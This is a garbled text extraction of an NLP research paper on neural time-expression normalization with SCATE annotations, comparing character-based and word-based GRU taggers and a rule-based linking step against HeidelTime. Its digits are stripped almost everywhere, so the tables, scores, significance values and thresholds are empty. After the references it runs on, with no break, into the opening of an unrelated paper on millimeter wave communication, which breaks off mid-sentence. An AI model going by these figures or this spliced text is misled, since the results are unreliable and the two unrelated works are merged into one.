annotation groups distribute in the aquaint and timebank documents. table shows that non-operators are much more frequent than operators (both explicit and implicit). models we decompose the normalization of time expressions into two subtasks: a) time entity identification which detects the spans of characters that belong to each time expression and labels them with their corre- sponding time entity; and b) time entity composition that links relevant entities together while respecting the entity type constraints imposed by the scate schema. these two tasks are run sequentially using the output of the former as input to the latter. once identification and composition steps are completed we can use the final product, i.e. semantic composi- tional of time entities, to feed the scate interpreter and encode time intervals. . time entity identification time entity identification is a type of sequence tag- ging task where each piece of a time expression is https://github.com/clulab/timenorm assigned a label that identifies the time entity that it evokes. we express such labels using the bio tagging system, where b stands for the beginning of an annotation, i for the inside, and o for outside any annotation. 
differing somewhat from standard sequence tagging tasks, the scate schema allows multiple annotations over the same span of text (e.g., “saturdays” in figure is both a day-of-week and a this), so entity identification models must be able to handle such multi-label classification. . . neural architectures recurrent neural networks (rnn) are the state- of-the-art on sequence tagging tasks (lample et al., a; graves et al., ; plank et al., ) thanks to their ability to maintain a memory of the sequence as they read it and make predictions conditioned on long distance features, so we also adopt them here. we introduce three rnn architectures that share a similar internal structure, but differ in how they repre- sent the output. they convert the input into features that feed an embedding layer. the embedded feature vectors are then fed into two stacked bidirectional gated recurrent units (grus), and the second gru followed by an activation function, outputs one bio tag for each input. we select gru for our models as they can outperform another popular recurrent unit lstm (long short term memory), in terms of pa- rameter updates and convergence in cpu time with the same number of parameters (chung et al., ). our -sigmoid model (figure ) approaches the task as a multi-label classification problem, with a set of sigmoids for each output that allow zero or more bio labels to be predicted simultaneously. this is the standard way of encoding multi-label classification problems for neural networks, but in our experiments, we found that these models perform poorly since they can overproduce labels for each input, e.g., could be labeled with both day-of-month and month- of-year at the same time. our -softmax model (figure ) splits the out- put space of labels into two sets: non-operators and operators (as defined in section . ). it is very un- likely that any piece of text will be annotated with more than one non-operator or with more than one operator, though it is common for text to be anno- in the training data, only of non-operators overlap with another non-operator, and only of operators overlap input feature embed bi-gru bi-gru sigmoid output non-operators and operators m m lu nnp b-last b-month a a ll nnp i-last i-month y y ll nnp i-last i-month zs ∅ ∅ nd cd b-day nd cd i-day . . . . . . . . . . . . . . . . . . figure : architecture of the -sigmoid model. the input is may . in scate-style annotation, may is a month- of-year (a non-operator), with an implicit last (an operator) over the same span, and is a day-of-month. at the feature layer, m is an uppercase letter (lu), a and y are lowercase letters (ll), space is a separator (zs), and may is a proper noun (nnp). input feature embed bi-gru bi-gru softmax output non-operators operators m m lu nnp b-month b-last a a ll nnp i-month i-last y y ll nnp i-month i-last zs ∅ o o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . figure : architecture of the -softmax model. the input is may. the scate annotations and features are the same as in figure . tated with one non-operator and one operator (see figure ). as a result, we can use two softmaxes, one for non-operators and one for operators, and the - softmax model thus can produce , , or labels per input. we share input and embedding layers, but as- sociate a separate set of stacked bi-grus with each output category, as shown in figure . our -softmax further splits operators into explicit operators and implicit operators (again, as defined with another operator. 
for example, a nyt said in an editorial on saturday, april , saturday is labeled as [day-of-week, last, intersection] where the last two labels are operators. in preliminary experiments, we tried sharing gru layers as well, but this generally resulted in worse performance. in section . ). we expect this to help the model since the learning task is very different for these two cases: with explicit operators, the model just has to memorize which phrases evoke which operators, while with implicit operators, the model has to learn to infer an operator from context (verb tense, etc.). we use three softmaxes, one each for non-operators, explicit operators, and implicit operators, and, as with -softmax, we share input and embedding layers, but associate a separate set of stacked bi-grus with each output category. the model looks similar to figure , but with three output groups instead of two. we feed three features as input to the rnns: text: the input word itself for the word-by-word model, or a the single input character for the character-by-character model. unicode character categories: the category of each character as defined by the unicode standard. this encodes information like the presence of upper- case (lu) or lowercase (ll) letters, punctuation (po), digits (nd), etc. for the word-by-word model, we concatenate the character categories of all characters in the word (e.g., may becomes lullll). part-of-speech: the part-of-speech as determined by the stanford pos tagger (toutanova et al., ). we expect this to be useful for, e.g., finding verb tense to help distinguish between implicit last and next operators. for the character-by-character model, we repeat the word-level part-of-speech tag for each char- acter in the word, and characters with no part-of- speech (e.g., spaces) get no tag. . . input: words vs. characters identifying scate-style time entity is a sequence tagging task, similar to named entity recognition (ner), so we take inspiration from recent work in neural architectures for ner. the first neural ner models followed the prior (non-neural) work in ap- proaching ner as a word classification problem, ap- plying architectures such as sliding-window feedfor- ward neural networks (qi et al., ), convolutional neural networks (cnns) with conditional random field (crf) layers (collobert et al., ), and lstm with crf layers and hand-crafted features (huang et al., ). more recently, character-level neural net- works have also been proposed for ner, including several which combine a cnn or lstm for learn- ing character-based representations of words with an lstm or lstm-crf for word-by-word labeling (chiu and nichols, ; lample et al., b; ma and hovy, ), as well as character-by-character sequence-to-sequence networks (gillick et al., ; kuru et al., ). based on these works, we consider two forms of input processing for our rnns: word-by-word vs. character-by-character. several aspects of the time normalization problem make the character-based ap- proach especially appealing. first, many time phrases involve numbers that must be interpreted semanti- cally (e.g., a good model should learn that months see http://unicode.org/notes/tn / cannot be a number higher than ), and digit-by- digit processing of numbers allows such interpreta- tions, while treating each number as a word would result in a sparse, intractable learning problem. 
sec- ond, word-based models assume that we know how to tokenize the text into words, but at times present challenging formats such as overnight, where over evokes a last operator and night is a part-of-day. finally, character-based models can ameliorate out- of-vocabulary (oov) words, which are a common problem when training sparse datasets. (hybrid word- character models, such as the lstm-cnns-crf (ma and hovy, ) can address this last problem, but not the previous two.) for our word-based model, we apply the nltk tokenizer (bird et al., ) to each sentence. we further tokenize with the regular expres- sion "\d+|[ˆ\d\w]+|\s" to break apart alpha- numeric expressions like edt. however, the tokenizer is unable to break-apart expressions such as and overnight. for our character-based model, no tokenization is applied and every character (including whitespace characters) is fed as input. . time entity composition once the entities of the time-expressions are identi- fied, they must be composed in order to obtain their semantic interpretation. this step of the analysis con- sists of two parts: linking the entities that make up a time-expression together and completing the entities’ properties with the proper values. for both cases, we set a simple set of rules that follow the constraints imposed by the scate schema . . . time entity linking algorithm shows the process followed to obtain the links between the time entities. first, we define an empty stack that will store the entities belong- ing to the same time expression. then, we iterate over the list of entities of a document sorted by their starting character offsets (sortbystart). for each of these entities (entity ) and for each entity in the stack (entity ), we check if the guidelines specify a possible link (linkisvalid) between the types of entity and entity . if such a link is possible, and https://github.com/bethard/ anafora-annotations/blob/master/.schema/ timenorm-schema.xml algorithm linking time entities stack = ∅ for entity in sortbystart(entities) do if start(entity ) - end(stack) > then stack = ∅ end if for entity in stack do if linkisvalid(entity , entity ) then createlink(entity , entity ) end if end for push(stack, entity ) end for it has not already been filled by another annotation, we greedily make the link (createlink). when the distance in the number of characters between the entity and the end of the stack is bigger than , we assume that the entities do not belong to the time expression. thus, we empty the stack. for example, our time entity identification model gets the year, month-of-year and day-of- month for the time-expression - - . our time entity composition algorithm then iterates over these entities. at the beginning the stack is empty, it just pushes the entity (year) into the stack. for the entity (month-of-year) it checks if the guidelines define a possible link between this en- tity type and the one currently in the stack (year). in this case, the guidelines establish that a year can have a sub-interval link to a season-of- year, a month-of-year or week-of-year. thus, the algorithm creates a sub-interval link between and . the entity is then pushed into the stack. this process is repeated for the en- tity (day-of-month) checking if there was a possible link to the entities in the stack ( , ). the guidelines define a possible sub-interval link between month-of-year and day-of-month, so a link is created here as well. 
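The linking procedure and the worked example above can be condensed into a few lines of code. The sketch below is a simplified rendering: the SCATE schema constraints are reduced to a small lookup table, the check that a link has not already been filled is omitted, and the character-distance threshold is an illustrative value (the paper tunes this threshold on the development data).

MAX_GAP = 10  # illustrative character-distance threshold


def link_is_valid(parent_type, child_type):
    """Stand-in for the SCATE schema: which parent types accept which child types."""
    allowed = {
        ("Year", "Month-Of-Year"): "sub-interval",
        ("Month-Of-Year", "Day-Of-Month"): "sub-interval",
        ("Last", "Month-Of-Year"): "interval",
    }
    return allowed.get((parent_type, child_type))


def link_entities(entities):
    """entities: dicts with 'start', 'end', 'type'. Returns (parent, relation, child) triples."""
    links, stack = [], []
    for entity in sorted(entities, key=lambda e: e["start"]):
        if stack and entity["start"] - stack[-1]["end"] > MAX_GAP:
            stack = []  # too far from the previous entity: start a new expression
        for earlier in stack:
            relation = (link_is_valid(earlier["type"], entity["type"])
                        or link_is_valid(entity["type"], earlier["type"]))
            if relation:
                links.append((earlier["type"], relation, entity["type"]))
        stack.append(entity)
    return links


# Year, month, and day entities produced by the identification step for "2016-01-26".
entities = [
    {"start": 0, "end": 4, "type": "Year"},
    {"start": 5, "end": 7, "type": "Month-Of-Year"},
    {"start": 8, "end": 10, "type": "Day-Of-Month"},
]
print(link_entities(entities))
# [('Year', 'sub-interval', 'Month-Of-Year'), ('Month-Of-Year', 'sub-interval', 'Day-Of-Month')]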
now, suppose that the following time entity in the list is several words ahead of so the character distance between both entities is larger than . if that is the case the stack is empty and the process starts again to compose a new time expression. the distance threshold was selected based on the perfor- mance on the development dataset. . . property completion the last step is to associate each time entity of a time-expression with a set of properties that include information needed for its interpretation. our system decides the value of these properties as follows: type: the scate schema defines that some enti- ties can only have specific values. for example, a season-of-year can only be spring, summer, fall or winter, a month-of-year can only be january, february, march, etc. to complete this property we take the text span of the time en- tity and normalize it to the values accepted in the schema. for example, if the span of a month-of- year entity was the numeric value we would normalize it to january, if its span was sep. we would normalize it to september, and so on. value: this property contains the value of a nu- merical entity, like day-of-month or hour-of- day.to complete it, we just take the text span of the entity and convert it to an integer. if it is written in words instead of digits (e.g., nineteen instead of ), we apply a simple grammar to convert to an integer. semantics: in news-style texts, it is common that expressions like last friday, when the dct is a fri- day, refer to the day as the dct instead of the previ- ous occurrence (as it would in more standard usage of last). scate indicates this with the semantics property, where the value interval-included in- dicates that the current interval is included when calculating the last or next occurrence. for the rest of the cases the value interval-not-included is used. in our system, when a last operator is found, if it is linked to a day-of-week (e.g. friday) that matches the dct, we set the value of this property to interval-included. interval-type: operators like next or last need an interval as reference in order to be interpreted. normally, this reference is the dct. for example, next week refers to the week following the dct, and in such a case the value of the property interval- type for the operator next would be doctime. however, sometimes the operator is linked to an in- terval that serves as reference by itself, for example, “by the year ”. in this cases the value of the interval-type is link. our system sets the value https://github.com/ghewgill/text num of this property to link if the operator is linked to a year and doctime otherwise. this is a very coarse heuristic; finding the proper anchor for a time expression is a challenging open problem for which future research is needed. . automatically generated training data every document in the dataset starts with a document creation time. these time expressions are quite partic- ular; they occur in isolation and not within the context of a sentence and they always yield a bounded inter- val. thus their identification is a critical factor in an interval based evaluation metric. however, document times appear in many different formats: ”monday, july- , ”, ” / / : am”, ” - - pm”, etc. many of these formats are not cov- ered in the training data, which is drawn from a small number of news sources, each of which uses only a single format. 
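A generator of this kind is easy to sketch. The example below assembles random document-creation-time strings from a handful of strftime patterns; the particular formats and date range are illustrative, and the paper's generator covers many more variants drawn from common office-suite conventions.

import random
from datetime import datetime, timedelta

FORMATS = [
    "%A, %B %d, %Y",      # Monday, July 04, 2016
    "%m/%d/%Y %I:%M %p",  # 07/04/2016 09:30 AM
    "%Y-%m-%d %H:%M",     # 2016-07-04 21:30
    "%d %b %Y",           # 04 Jul 2016
    "%Y%m%d",             # 20160704
]


def random_doc_time(rng):
    """Draw a random moment over roughly 25 years and render it in a random format."""
    base = datetime(1995, 1, 1)
    moment = base + timedelta(minutes=rng.randrange(60 * 24 * 365 * 25))
    return moment.strftime(rng.choice(FORMATS))


rng = random.Random(0)
for _ in range(3):
    print(random_doc_time(rng))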
we therefore designed a time gen- erator to randomly generate an extra isolated training examples for a wide variety of such expres- sion formats. the generator covers different for- mats which include variants covering abbreviation, with/without delimiters, mixture of digits and strings, and different sequences of time units. experiments we train and evaluate our models on the scate cor- pus described in section . as a development dataset, documents are taken as a random stratified sample from the tempeval (timebank + aquaint) portion shown in table , including broadcast news documents ( abc, cnn, pri, voa), and newswire documents ( ap, nyt, wsj). we use the interval-based evaluation metric described in sec- tion , but also report more traditional information extraction metrics (precision, recall, and f ) for the time entity identification and composition steps. let s be the set of items predicted by the system and h is the set of items produced by the humans, precision (p ), recall (r), and f are defined as: p(s, h) = |s ∩h| |s| r(s, h) = |s ∩h| |h| we use the common formats available in office suites, specif- ically, libreoffice. f (s, h) = ·p(s, h) ·r(s, h) p(s, h) + r(s, h) . for these calculations, each item is an annotation, and one annotation is considered equal to another if it has the same character span (offsets), type, and properties (with the definition applying recursively for properties that point to other annotations). to make the experiments with different neural ar- chitectures comparable, we tuned the parameters of all models to achieve the best performance on the development data. due to space constraints, we only list here the hyper-parameters for our best char - softmax: the embedding size of the character-level text, word-level text, pos tag, and unicode character category features are , , and , respec- tively. to avoid overfitting, we used dropout with probabilities . , . and . for the features, respectively; the sizes of the first and second layer gru units are set as and . we trained the model with rmsprop optimization on mini-batches of size , and followed standard recommendations to leave the optimizer hyperparameter settings at their default values. each model is trained for at most epochs, the longest training time for char -softmax model is around hours using x nvidia kepler k x gpu. . model selection we compare the different time entity identification models described in section . , training them on the training data, and evaluating them on the develop- ment data. among the epochs of each model, we se- lect the epoch based on the output(s) which the model is good at predicting because based on its weakness, the model would yield unstable results in our pre- liminary experiments. for example, for -softmax models, our selections rely on the performances of non-operators and implicit-operators. table shows the results of the development phase. first, we find that the character-based models out- perform the word-based models. for example, the best character-based model achieves the f of . (char -softmax),which is significantly better than the best word-based model achieving the f of only we briefly explored using pre-trained word embeddings to try to improve the performance of the word -sigmoid model, but it yielded a performance that was still worse than the character-based model, so we didn’t explore it further. model p r f word -sigmoid . . . char -sigmoid . . . word -softmax . . . char -softmax . . . word -softmax . . . char -softmax . . . 
char -softmax extra . . . table : precision (p ), recall (r), and f for the different neural network architectures on time entity identification on the development data. . (p= ). second, we find that softmax mod- els outperform sigmoid models. for example, the char -softmax model achives the f of . , sig- nificantly better than . f of the char -sigmoid model (p= ). third, for both character- and word- based models, we find that -softmax significantly outperforms -softmax: the char -softmax f of . is better than the char -softmax f of . (p= ) and the word -softmax f of . is bet- ter than the word -softmax f of . (p= . ). additionally, we find that all models are better at identifying non-operators than operators and that the explicit operators are the hardest to solve. for ex- ample, the char -softmax model gets . f for non-operators, . f for explicit operators and . f for implicit operators. finally, we also train the best model, char -softmax, using the generated an- notations described in section . and achieve . f (char -softmax extra), i.e., the model performs better without the extra data (p= ). this is probably a result of overfitting due to the small variety of time formats in the training and development data. from this analysis on the development set, we se- lect two variants of the char -softmax architecture for evaluation on the test set: char -softmax and char -softmax extra. these models were then cou- pled with the rule-based linking system described in section . to produce a complete scate-style parsing system. . model evaluation we evaluate both char -softmax and char - softmax extra on the test set for identification and we used a paired bootstrap resampling significance test. char -softmax char -soft. extra p r f p r f non-op . . . . . . exp-op . . . . . . imp-op . . . . . . ident . . . . . . comp . . . . . . table : results on the test set for time entity identifi- cation (ident) and time entity composition (comp) steps. for the former we report the performances for each entity set: non-operators (non-op), explicit operators (exp-op) and implicit operators (imp-op). model p r f heideltime . . . char -softmax . . . char -softmax extra . . . table : precision (p ), recall (r), and f of our models on the test data producing bounded time intervals. for comparison, we include the results obtained by heidel- time. composition tasks. table shows the results. on the identification task, char -softmax extra is no worse than using the original dataset with the over- all f . vs. . (p= . ), and using extra generated data the model is better at predicting non- operators and implicit operators with higher preci- sions (p= . ), which is the key to produce correct bounded time intervals. to compare our approach with the state-of-the-art, we run heideltime on the test documents and make use of the metric described in section . this way, we can compare the intervals produced by both sys- tems no matter the annotation schema. table shows that our model with additional randomly generated training data outperforms heideltime in terms of precision, with a significant difference of . per- centage points (p= . ), while heideltime obtains a non-significant better performance in terms of re- call (p= . ). overall, our model gets . more percentage points than heideltime in terms of f (p= . ). notice that, although the model trained without extra annotations is better in time entity com- position (see table ), it performs much worse at producing final intervals. 
this is caused by the fact model p r f heideltime . . . char -softmax . . . char -softmax extra . . . table : precision (p ), recall (r), and f on bounded intervals on the timeml/scate perfect overlapping test data. that this model fails to identify the non-operators that compound dates in unseen formats (see section . ). however, evaluating heideltime in the scate annotations may not be totally fair. heideltime was developed following the timeml schema and, as we show in section , scate covers a wider set of time expressions. for this reason, we perform an additional evaluation. first, we compare the annota- tions in the test set using our interval-based metric, similar to the comparison reported in table , and select those cases where timeml and scate match perfectly. then, we remove the rest of the cases from the test set. consequently, we also remove the pre- dictions given by the systems, both ours and heidel- time, for those instances. finally, we run the interval scorer using the new configuration. as can be seen in table all the models improve their performances. however, our model still performs better when it is trained with the extra annotations. the scate interpreter that encodes the time in- tervals needs the compositional graph of a time- expression to have all its elements correct. thus, failing in the identification of any entity of a time- expression results in totally uninterpretable graphs. for example, in the expression next year, if our model identifies year as a period instead of an inter- val it cannot be linked to next because it violates the scate schema. the model can also fail in the recognition of some time-entities, like summer in the expression last summer. this identification errors are caused mainly by the sparse training data. as graphs containing these errors produce unsolvable logical formulae, the interpreter cannot produce intervals and hence the recall decreases. within those inter- vals that are ultimately generated, the most common mistake is to confuse the last and next operators, and as a result an incorrectly placed interval even with correctly identified non-operators. for example, if an october with an implicit next operator is in- stead given a last operator, instead of referring to [ - - t : , - - t : ), it will refer to [ - - t : , - - t : ). missing implicit operators is also the main source of errors for heideltime, which fails with complex compositional graphs. for example, that january day in is annotated by heideltime as two different intervals, corresponding respectively to january and . as a consequence, heideltime predicts not one but two incorrect intervals, affecting its precision. discussion as for the time entity identification task, the per- formance differences between development and test dataset could be attributed to the annotation distri- butions of the datasets. for example, there are season-of-year annotations in the test set while there are no such annotations in the development dataset; the relative frequencies of the annotations minute- of-hour, hour-of-day, two-digit-year and time- zone in the test set are much lower, and our models are good at predicting such annotations. explicit operators are very lexically-dependent, e.g. last corresponds to one word from the set {last, latest, previously, recently, past, over, recent, earlier, the past, before}, and the majority of them appear once or twice in the training and development sets. 
our experiments verify the advantages of character-based-models in predicting scate anno- tations, which are in agreement with our explana- tions in section . . : word-based-models tend to fail to distinguish numbers from digit-based time ex- pressions. it’s difficult for word-based-models to catch some patterns of time expressions, such as th and th, august and aug., etc., while character- based models are robust to such variance. we ran an experiment to see whether these benefits were unique to compositional annotations like those of scate, or more generally to simply recognizing time expressions. we used the timeml annotations from aquaint and timebank (see table ) to train two multi-class classifiers to identify timex an- notations. the models were similar to our char - softmax and word -softmax models, using the same parameter settings, but with a single softmax output layer to predict the four types of timex : date, time, duration, and set. as shown in table , timex timex -digits p r f p r f char . . . . . . word . . . . . . table : precision (p ), recall (r), and f for character- based and word-based models in predicting timeml timex annotations on the tempeval test set. timex -digits is the subset of annotations that contain digits. on the test set the word-based model significantly out- performs the character-based model in terms of both time expressions (p= . ) and the subset of time expressions that contain digits (p= . ). these results suggest that the reason character-based mod- els are more successful on the scate annotations is that scate breaks time expressions down into meaningful sub-components. for example, timeml would simply call monday, - - a date, and call : : gmt saturday a time. scate would identify four and five, respectively, different types of semantic entities in these expression; and each scate entity would be either all letters or all digits. in timeml, the model is faced with difficult learning tasks, e.g., that sometimes a weekday name is part of a date and sometimes it is part of a time, while in scate, a weekday name is always a day-of- week. on the other hand, running the entity composition step with gold entity identification achieves . in terms of f . one of the main causes of errors in this step is the heuristic to complete the interval-type property. as we explain in section . , we implement a too coarse set of rules for this case. another source of errors is the distance of the characters we use to decide if the time entities belong to the same time expression. this condition prevents the creation of some links, for example, the expression “later” at the beginning of a sentence typically refers to another time interval in a previous sentence, so the distance between them is much longer. conclusion we have presented the first model for time normaliza- tion trained on scate-style annotations. the model outperforms the rule-based state-of-the-art, proving that describing time expressions in terms of compo- sitional time entities is suitable for machine learn- ing approaches. this broadens the research in time normalization beyond the more restricted timeml schema. we have shown that a character-based neural network architecture has advantages for the task over a word-based system, and that a multi-output net- work performs better than producing a single output. 
furthermore, we have defined a new interval-based evaluation metric that allows us to perform a com- parison between annotations based on both scate and timeml schema, and found that scate pro- vides a wider variety of time expressions. finally, we have seen that the sparse training set available induces model overfitting and that the largest number of errors are committed in those cases that appear less frequently in the annotations. this is more significant in the case of explicit operators because they are very dependent on the lexicon. improving performance on these cases is our main goal for future work. accord- ing to the results presented in this work, it seems that a solution would be to obtain a wider training set, so a promising research line is to extend our approach to automatically generate new annotations. software the code for the scate-style time normalization models introduced in this paper is available at https://github.com/clulab/timenorm. acknowledgements we thank the anonymous reviewers as well as the action editor, mona diab, for helpful comments on an earlier draft of this paper. the work was funded by the thyme project (r lm ) from the national library of medicine, and used computing resources supported by the national science founda- tion under grant no. . the content is solely the responsibility of the authors and does not nec- essarily represent the official views of the national library of medicine, national institutes of health, or national science foundation. references [bethard and parker ] steven bethard and jonathan parker. . a semantically compositional anno- tation scheme for time normalization. in proceedings of the tenth international conference on language re- sources and evaluation (lrec ), paris, france, . european language resources association (elra). [bethard ] steven bethard. . a synchronous con- text free grammar for time normalization. in proceed- ings of the conference on empirical methods in natural language processing, pages – , seattle, washington, usa, . association for computational linguistics. [bird et al. ] steven bird, ewan klein, and edward loper. . natural language processing with python: analyzing text with the natural language toolkit. o’reilly media, inc. [chiu and nichols ] jason p. c. chiu and eric nichols. . named entity recognition with bidirectional lstm-cnns. transactions of the association for computational linguistic, : – . [chung et al. ] junyoung chung, caglar gulcehre, kyunghyun cho, and yoshua bengio. . empiri- cal evaluation of gated recurrent neural networks on se- quence modeling. arxiv preprint arxiv: . v . [collobert et al. ] ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (al- most) from scratch. the journal of machine learning research, : – , november. [fischer and strötgen ] frank fischer and jannik strötgen. . when does (german) literature take place? on the analysis of temporal expressions in large corpora. in proceedings of dh : annual conference of the alliance of digital humanities orga- nizations, volume , sydney, australia. [gillick et al. ] dan gillick, cliff brunk, oriol vinyals, and amarnag subramanya. . multilin- gual language processing from bytes. in kevin knight, ani nenkova, and owen rambow, editors, naacl hlt , the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, san diego california, usa, june - , , pages – . 
the association for computational linguistics. [graves et al. ] alex graves, abdel-rahman mo- hamed, and geoffrey hinton. . speech recog- nition with deep recurrent neural networks. in ieee international conference on acoustics, speech and signal processing, pages – . ieee. [han and lavie ] benjamin han and alon lavie. . a framework for resolution of time in natural language. ( ): – , march. [huang et al. ] zhiheng huang, wei xu, and kai yu. . bidirectional lstm-crf models for sequence tagging. corr, abs/ . . [kuru et al. ] onur kuru, ozan arkan can, and deniz yuret. . charner: character-level named entity recognition. in coling , th international con- ference on computational linguistics, proceedings of the conference: technical papers, december - , , osaka, japan, pages – . [lample et al. a] guillaume lample, miguel balles- teros, sandeep subramanian, kazuya kawakami, and chris dyer. a. neural architectures for named entity recognition. in proceedings of the con- ference of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – . association for compu- tational linguistics. [lample et al. b] guillaume lample, miguel balles- teros, sandeep subramanian, kazuya kawakami, and chris dyer. b. neural architectures for named entity recognition. in naacl hlt , the conference of the north american chapter of the as- sociation for computational linguistics: human lan- guage technologies, san diego california, usa, june - , , pages – . [lee et al. ] kenton lee, yoav artzi, jesse dodge, and luke zettlemoyer. . context-dependent semantic parsing for time expressions. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , baltimore, maryland, . association for computational linguistics. [lin et al. ] chen lin, elizabeth w. karlson, dmitriy dligach, monica p. ramirez, timothy a. miller, huan mo, natalie s. braggs, andrew cagan, vivian s. gainer, joshua c. denny, and guergana k. savova. . automatic identification of methotrexate- induced liver toxicity in patients with rheumatoid arthritis from the electronic medical record. jour- nal of the american medical informatics association, (e ):e –e . [llorens et al. ] hector llorens, leon derczynski, robert j. gaizauskas, and estela saquete. . timen: an open temporal expression normalisa- tion resource. in language resources and evaluation conference, pages – . european language re- sources association (elra). [ma and hovy ] xuezhe ma and eduard hovy. . end-to-end sequence labeling via bi-directional lstm-cnns-crf. in proceedings of the th annual meeting of the association for computational linguis- tics (acl ), volume . association for computa- tional linguistics. [mazur and dale ] pawet mazur and robert dale. . wikiwars: a new corpus for research on tempo- ral expressions. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. [plank et al. ] barbara plank, anders søgaard, and yoav goldberg. . multilingual part-of-speech tag- ging with bidirectional long short-term memory models and auxiliary loss. in proceedings of the th annual meeting of the association for computational linguis- tics (volume : short papers), pages – , berlin, germany, august. association for computational lin- guistics. [pustejovsky et al. 
a] james pustejovsky, josé castaño, robert ingria, roser saurı́, robert gaizauskas, andrea setzer, and graham katz. a. timeml: robust specification of event and temporal expressions in text. in iwcs- , fifth international workshop on computational semantics. [pustejovsky et al. b] james pustejovsky, patrick hanks, roser sauri, andrew see, robert gaizauskas, andrea setzer, dragomir radev, beth sundheim, david day, lisa ferro, and marcia lazo. b. the timebank corpus. in proceedings of corpus linguistics , lancaster. [pustejovsky et al. ] james pustejovsky, kiyong lee, harry bunt, and laurent romary. . iso-timeml: an international standard for semantic annotation. in proceedings of the th international conference on language resources and evaluation (lrec’ ), val- letta, malta. european language resources associa- tion (elra). [qi et al. ] yanjun qi, koray kavukcuoglu, ronan collobert, jason weston, and pavel p. kuksa. . combining labeled and unlabeled data with word-class distribution learning. in proceedings of the th acm conference on information and knowledge management, acm, pages – . [schilder ] frank schilder. . extracting meaning from temporal nouns and temporal prepositions. acm transactions on asian language information process- ing (talip) - special issue on temporal information processing, ( ): – , march. [strötgen and gertz ] jannik strötgen and michael gertz. . multilingual and cross-domain tem- poral tagging. language resources and evaluation, ( ): – . [strötgen and gertz ] jannik strötgen and michael gertz. . a baseline temporal tagger for all lan- guages. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal, september. associa- tion for computational linguistics. [strötgen et al. ] jannik strötgen, julian zell, and michael gertz. . heideltime: tuning english and developing spanish resources for tempeval- . in proceedings of the seventh international workshop on semantic evaluation, semeval ’ , pages – . asso- ciation for computational linguistics. [toutanova et al. ] kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic de- pendency network. in proceedings of the confer- ence of the north american chapter of the association for computational linguistics on human language technology - volume , naacl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. [uzzaman et al. ] naushad uzzaman, hector llorens, leon derczynski, james allen, marc verhagen, and james pustejovsky. . semeval- task : tempeval- : evaluating time expressions, events, and temporal relations. in second joint conference on lexical and computational semantics (*sem), volume : proceedings of the seventh international workshop on semantic evaluation (semeval ), pages – , at- lanta, georgia, usa, . association for computational linguistics. [verhagen et al. ] marc verhagen, robert gaizauskas, frank schilder, mark hepple, graham katz, and james pustejovsky. . semeval- task : tempeval temporal relation identification. in proceedings of the th international workshop on semantic evaluations, semeval ’ , pages – , prague, czech republic. [verhagen et al. ] marc verhagen, roser sauri, tom- maso caselli, and james pustejovsky. . semeval- task : tempeval- . in proceedings of the th international workshop on semantic evaluation, pages – , uppsala, sweden, . association for computa- tional linguistics. [vossen et al. 
] piek vossen, rodrigo agerri, itziar aldabe, agata cybulska, marieke van erp, antske fokkens, egoitz laparra, anne-lyse minard, alessio palmero aprosio, german rigau, marco rospocher, and roxane segers. . newsreader: using knowledge resources in a cross-lingual reading machine to generate more knowledge from massive streams of news. special issue knowledge-based systems, elsevier. paper title (use style: paper title) doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , research and development of millimeter wave technology bai junying college of informationengineering north china university of science andtechnology tangshan, , china e-mail: @ .com an yongli* college of informationengineering north china university of science andtechnology tangshan, heibei, , china e-mail: tongxinayl@ .com abstract—this paper introduces the concept of millimeter wave, analyzes the advantages and disadvantages and propagation characteristics of millimeter wave, and expounds the research status of millimeter wave ground communication and millimeter wave satellite communication. the military application of millimeter wave communication technology in electronic countermeasures is taken as an example. finally, the outlook for millimeter wave communication technology will open up new application fields in the future and have broad development prospects. keywords-millimeter wave; millimeter wave propagation i. introduction with the rapid development of mobile communications, satellite communications, and on- board electronics, there is an increasing shortage of spectrum resources. however, users continue to put forward higher requirements on the speed, throughput and distance in wireless mobile communication, and the capacity requirements of the system are also getting higher and higher. due to the extremely rich spectrum resources in the high-frequency microwave band, modern communication systems are developing towards high-frequency microwaves, especially in the millimeter-wave band. millimeter wave communication has many unique features compared with traditional radio short wave, ultrashort wave and microwave communication. since the millimeter wave is made up of microwaves and light waves (its wavelength is between the microwave and the light wave), it has some advantages of microwave and light waves. the communication device is small in size, and can be used with a small-sized antenna to obtain high directivity, which facilitates concealment and confidentiality of communication. the extremely high attenuation rate of millimeter waves propagating in wireless space is the biggest obstacle faced by millimeter wave systems in outdoor wireless communication applications. fortunately, the millimeter wave has a small wavelength, allowing a large number of antennas to be installed without increasing the volume of the existing communication device, and the resulting large-scale antenna array can provide high beamforming gain, thereby obtaining sufficient link balance. the amount[ ]. at present, bell labs usa has achieved significant capacity improvement and related efficiency improvements by using large-scale mimo technology (multi-input and multi-output technology) in the millimeter wave band. 
with prototypes with peak transmission rates in excess of gbps, bell labs has successfully achieved spectral efficiencies of up to bps / hz in the ghz millimeter-wave band, and its transfer rate allows users to download faster using the network, enabling only a few hundred megabytes of data transfer is reached in a few seconds. the realization of millimeter wave communication technology has provided a new development direction for future research on the realization of touchable internet, low latency virtual reality and future applications such as d. ii. millimeter wave characteristics compared with light waves, millimeter waves use the atmospheric window (millimeter waves and submillimeter waves propagate in the atmosphere, the attenuation due to the absorption of gas molecules is a small frequency, the attenuation is small), the attenuation is small, by natural light and the influence of the heat radiation source is small. a. advantages ) extremely wide bandwidth. the millimeter wave frequency range is generally considered to be . to ghz, and the bandwidth is as high as . ghz. more than times the total bandwidth from dc to microwave. even considering atmospheric absorption, only four main windows can be used for propagation in the atmosphere, but the total bandwidth of the four international journal of advanced network, monitoring and controls volume , no. , windows is also up to ghz, which is five times the sum of the bandwidths of the bands below the microwave. this is undoubtedly very attractive today when the frequency resources are tight. ) the beam is narrow. the millimeter wave beam is much narrower than the microwave beam at the same antenna size. for example, a cm antenna has a beamwidth of degrees at . ghz and a beamwidth of only . degrees at ghz. it is therefore possible to distinguish small targets that are closer together or to see the details of the target more clearly. ) compared with lasers, the propagation of millimeter waves is much less affected by the climate and can be considered to have 